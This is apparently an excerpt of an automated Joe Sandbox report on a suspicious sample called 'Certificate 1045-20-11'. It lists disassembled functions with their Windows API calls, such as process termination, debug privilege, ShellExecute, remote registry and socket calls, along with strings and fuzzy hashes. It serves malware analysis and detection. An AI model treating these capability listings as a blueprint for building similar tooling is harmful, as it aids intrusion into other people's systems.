                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: b45a1ebe307d61cd7f83f77c501c15e361ddaf7f0d40caf02e603dd803f92fe5
                                                                                • Instruction ID: 9be52095b808a3442e01cfac689950de42959c259f6679258660461a4eb3cf4e
                                                                                • Opcode Fuzzy Hash: b45a1ebe307d61cd7f83f77c501c15e361ddaf7f0d40caf02e603dd803f92fe5
                                                                                • Instruction Fuzzy Hash: F201BBB6240344BFE710BBB5DC49F6B7BACFB88711F018425FA05DB2A1DA749801CB61
                                                                                Function 0089C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 572366e0a38bf7a50f5baafb81030dd872e77b96b72298c8c5a280a6015fc121
                                                                                • Instruction ID: 954b6669046a420f4be425a019794f466f7c565d9148d0a58868cd1226caede6
                                                                                • Opcode Fuzzy Hash: 572366e0a38bf7a50f5baafb81030dd872e77b96b72298c8c5a280a6015fc121
                                                                                • Instruction Fuzzy Hash: 1CE1A171A0021AAFDF14EFA8C881AAE77B5FF48354F188029F945EB281D771ED45CB91
                                                                                Function 0089BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$_memset
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2862541840-625585964
                                                                                • Opcode ID: 79d30211f0546d56b55ff694828149cf47d6beaef825e1c554274da7a0b728b8
                                                                                • Instruction ID: 1e9b6074fdf029c29e6cd946d0200f1b4a642a0f1532e973033cd238b66b6094
                                                                                • Opcode Fuzzy Hash: 79d30211f0546d56b55ff694828149cf47d6beaef825e1c554274da7a0b728b8
                                                                                • Instruction Fuzzy Hash: 1E919C71A00219AFDF24EFA4E944FAEBBB8FF85714F148159F515EB280DB709944CBA0
                                                                                Function 008A9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008A9B19
                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 008A9B2D
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008A9B47
                                                                                • _wcscat.LIBCMT ref: 008A9BA2
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 008A9BB9
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008A9BE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcscat
                                                                                • String ID: SysListView32
                                                                                • API String ID: 307300125-78025650
                                                                                • Opcode ID: c6fc8f0c957f898a936841221fbec76a5a60cd47d2d3e0b0981fb055234716b9
                                                                                • Instruction ID: 8624bd186a820bf6f7d230a440a488fae231cf838af3736a282b467ae1d75430
                                                                                • Opcode Fuzzy Hash: c6fc8f0c957f898a936841221fbec76a5a60cd47d2d3e0b0981fb055234716b9
                                                                                • Instruction Fuzzy Hash: 4F41CE70904318AFEB219FA8CC85FEA77B8FF09350F10042AF689E7291D6759D85CB60
                                                                                Function 008A172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00886532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00886554
                                                                                  • Part of subcall function 00886532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00886564
                                                                                  • Part of subcall function 00886532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 008865F9
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008A179A
                                                                                • GetLastError.KERNEL32 ref: 008A17AD
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008A17D9
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 008A1855
                                                                                • GetLastError.KERNEL32(00000000), ref: 008A1860
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008A1895
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: d0dd79247a10a0380e786fd045d71b9f79925609af3acc690894ac30a8f30c00
                                                                                • Instruction ID: cb7b56263ecca6136bbad19b4ac0fe68e067329e9a7fec1a1ab3c02bdb2b593f
                                                                                • Opcode Fuzzy Hash: d0dd79247a10a0380e786fd045d71b9f79925609af3acc690894ac30a8f30c00
                                                                                • Instruction Fuzzy Hash: 4F417D71600205AFEF05EF58C899F6DB7A5FF55710F088069F906DB392DBB8A9048B92
                                                                                Function 00885819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 008858B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: 96dd1e8c9ed270e9b9a92225faa10e55c2b4ebc108c0c36ee9f9abfbb14c48b5
                                                                                • Instruction ID: 9371294714de529b30c8a58f6658c10f9cb2b7eb962646a21782c5a95949c0cf
                                                                                • Opcode Fuzzy Hash: 96dd1e8c9ed270e9b9a92225faa10e55c2b4ebc108c0c36ee9f9abfbb14c48b5
                                                                                • Instruction Fuzzy Hash: 9511DD3560D74AFAE7157B649C82D6B779CFF25314B20003BF611E63C2E774AA005769
                                                                                Function 0088A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0088A806
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafeVartype
                                                                                • String ID:
                                                                                • API String ID: 1725837607-0
                                                                                • Opcode ID: 2878af42251c33a5fb030ae3c367e69860d045343eec797ed1c741cebf3d3967
                                                                                • Instruction ID: 746729a9d79d1d07c6fe140690415e25223eb4f289f36ba790fe75d12039b3b6
                                                                                • Opcode Fuzzy Hash: 2878af42251c33a5fb030ae3c367e69860d045343eec797ed1c741cebf3d3967
                                                                                • Instruction Fuzzy Hash: 3EC1917590421ADFEB08EF98C481BAEB7F4FF08315F24406AE655E7281D734A942CB96
                                                                                Function 00886B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00886B63
                                                                                • LoadStringW.USER32(00000000), ref: 00886B6A
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00886B80
                                                                                • LoadStringW.USER32(00000000), ref: 00886B87
                                                                                • _wprintf.LIBCMT ref: 00886BAD
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00886BCB
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00886BA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 3648134473-3128320259
                                                                                • Opcode ID: d54b404a3cb1f610aba5de139e5e1bcb3b8fefbedddeef15538aee780550e465
                                                                                • Instruction ID: d55fe11963338baad43e58b7ad5a9e7ad09721df38d139888324b3a82cf71226
                                                                                • Opcode Fuzzy Hash: d54b404a3cb1f610aba5de139e5e1bcb3b8fefbedddeef15538aee780550e465
                                                                                • Instruction Fuzzy Hash: 7C011DF6900308BFEB11BBA49D89EF6777CFB08304F0444A6B746E2141EA749E858B71
                                                                                Function 008A2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A2BF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 2595220575-0
                                                                                • Opcode ID: 175e9bdda5c9861edb3e4ca1bb72cfe8732283714872b85263211cbbf7692621
                                                                                • Instruction ID: 06afa38838155e97ccc05357515a63b97998082d26976ff989bfe15a83e2552e
                                                                                • Opcode Fuzzy Hash: 175e9bdda5c9861edb3e4ca1bb72cfe8732283714872b85263211cbbf7692621
                                                                                • Instruction Fuzzy Hash: 089145712042099FDB20EF58C891B6EB7E5FF89314F04881DF996DB2A2DB74E945CB42
                                                                                Function 0089961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • select.WSOCK32 ref: 00899691
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0089969E
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008996C8
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008996E9
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 008996F8
                                                                                • inet_ntoa.WSOCK32(?), ref: 00899765
                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 008997AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 500251541-0
                                                                                • Opcode ID: 08f8cb672c080efd08e07bba0ba277fd0bd88ee122edfcc239fb82d4ae7d3af7
                                                                                • Instruction ID: c5219673933c1878ef509a36ff875ff08bb9f7f919a307a63125c7bc0cd7a48e
                                                                                • Opcode Fuzzy Hash: 08f8cb672c080efd08e07bba0ba277fd0bd88ee122edfcc239fb82d4ae7d3af7
                                                                                • Instruction Fuzzy Hash: 9F71BC31504204ABCB14EF68CC85E6BB7A8FF85714F144A2DF596E72A1EB30E905CB62
                                                                                Function 0086A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __mtinitlocknum.LIBCMT ref: 0086A991
                                                                                  • Part of subcall function 00867D7C: __FF_MSGBANNER.LIBCMT ref: 00867D91
                                                                                  • Part of subcall function 00867D7C: __NMSG_WRITE.LIBCMT ref: 00867D98
                                                                                  • Part of subcall function 00867D7C: __malloc_crt.LIBCMT ref: 00867DB8
                                                                                • __lock.LIBCMT ref: 0086A9A4
                                                                                • __lock.LIBCMT ref: 0086A9F0
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,008F6DE0,00000018,00875E7B,?,00000000,00000109), ref: 0086AA0C
                                                                                • EnterCriticalSection.KERNEL32(8000000C,008F6DE0,00000018,00875E7B,?,00000000,00000109), ref: 0086AA29
                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 0086AA39
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1422805418-0
                                                                                • Opcode ID: b1bb50f995443c422e44e1a08bc61b619c204831ec6ee8329ca6932fbdcc6e91
                                                                                • Instruction ID: aca57c491ef71ff5de34dc98c49490a431d6baa200f96068ecdd00145da8b563
                                                                                • Opcode Fuzzy Hash: b1bb50f995443c422e44e1a08bc61b619c204831ec6ee8329ca6932fbdcc6e91
                                                                                • Instruction Fuzzy Hash: 7E4106719002259FEB189FACDA44758BBB0FF41336F22822AE525FB2D1D7749940CF92
                                                                                Function 008A8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 008A8EE4
                                                                                • GetDC.USER32(00000000), ref: 008A8EEC
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008A8EF7
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 008A8F03
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 008A8F3F
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008A8F50
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 008A8F8A
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008A8FAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: cb33b1641a3fcb94bff961acb297bfd7baa798b51c61d44e641df110ae70e3cd
                                                                                • Instruction ID: 0b8ca99b2b20ed372764c7040e1817eaf68f9fad1ef31167897450a7844c1815
                                                                                • Opcode Fuzzy Hash: cb33b1641a3fcb94bff961acb297bfd7baa798b51c61d44e641df110ae70e3cd
                                                                                • Instruction Fuzzy Hash: 06316B72200614BFEB109F54CC4AFEA3BA9FF4A715F044065FE49DA291DAB59841CBB4
                                                                                Function 008916DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                  • Part of subcall function 0085C6F4: _wcscpy.LIBCMT ref: 0085C717
                                                                                • _wcstok.LIBCMT ref: 0089184E
                                                                                • _wcscpy.LIBCMT ref: 008918DD
                                                                                • _memset.LIBCMT ref: 00891910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                • String ID: X
                                                                                • API String ID: 774024439-3081909835
                                                                                • Opcode ID: 2fad5fbb3e45bf38daf0fde2efa2412e4b92afb27874145431cb17df6059fb5e
                                                                                • Instruction ID: cbc7108d779157f40237b23ec3fd71421d32ce9f6fcf957bea3b7d6ba1b0ba58
                                                                                • Opcode Fuzzy Hash: 2fad5fbb3e45bf38daf0fde2efa2412e4b92afb27874145431cb17df6059fb5e
                                                                                • Instruction Fuzzy Hash: E6C15C315083559FCB24EF28C885A6AB7E4FF85354F04492DF99AD72A2DB30ED05CB82
                                                                                Function 008B0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 008B016D
                                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 008B038D
                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008B03AB
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008B03D6
                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008B03FF
                                                                                • ShowWindow.USER32(00000003,00000000), ref: 008B0421
                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 008B0440
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                • String ID:
                                                                                • API String ID: 3356174886-0
                                                                                • Opcode ID: 95be81bc839a61a8d0020f5d8a496f4db2dd18ff90928beb0c294ac38f819423
                                                                                • Instruction ID: a4661b6424be7b2f542323049e9dcf2b4678b9b5cc70ddb18be26a1d1b9f5fa6
                                                                                • Opcode Fuzzy Hash: 95be81bc839a61a8d0020f5d8a496f4db2dd18ff90928beb0c294ac38f819423
                                                                                • Instruction Fuzzy Hash: 2DA17B3560061AAFDB18CF68C989BEEBBB1FB08705F148125E855EB394DB74AD50CF90
                                                                                Function 0085AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e390c1471f3dc3374b41e78d12c843848925eeaeda7e4535f1729d1a7637ea7
                                                                                • Instruction ID: 6a18152b99d394c673d10090f33bec1afae0fccecc3ae251a1edd8acb2f29cd7
                                                                                • Opcode Fuzzy Hash: 3e390c1471f3dc3374b41e78d12c843848925eeaeda7e4535f1729d1a7637ea7
                                                                                • Instruction Fuzzy Hash: E1716BB0900509EFCB08DF98CC89EEEBB74FF89315F148259F915A7251D730AA45CB61
                                                                                Function 008A2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008A225A
                                                                                • _memset.LIBCMT ref: 008A2323
                                                                                • ShellExecuteExW.SHELL32(?), ref: 008A2368
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                  • Part of subcall function 0085C6F4: _wcscpy.LIBCMT ref: 0085C717
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008A242F
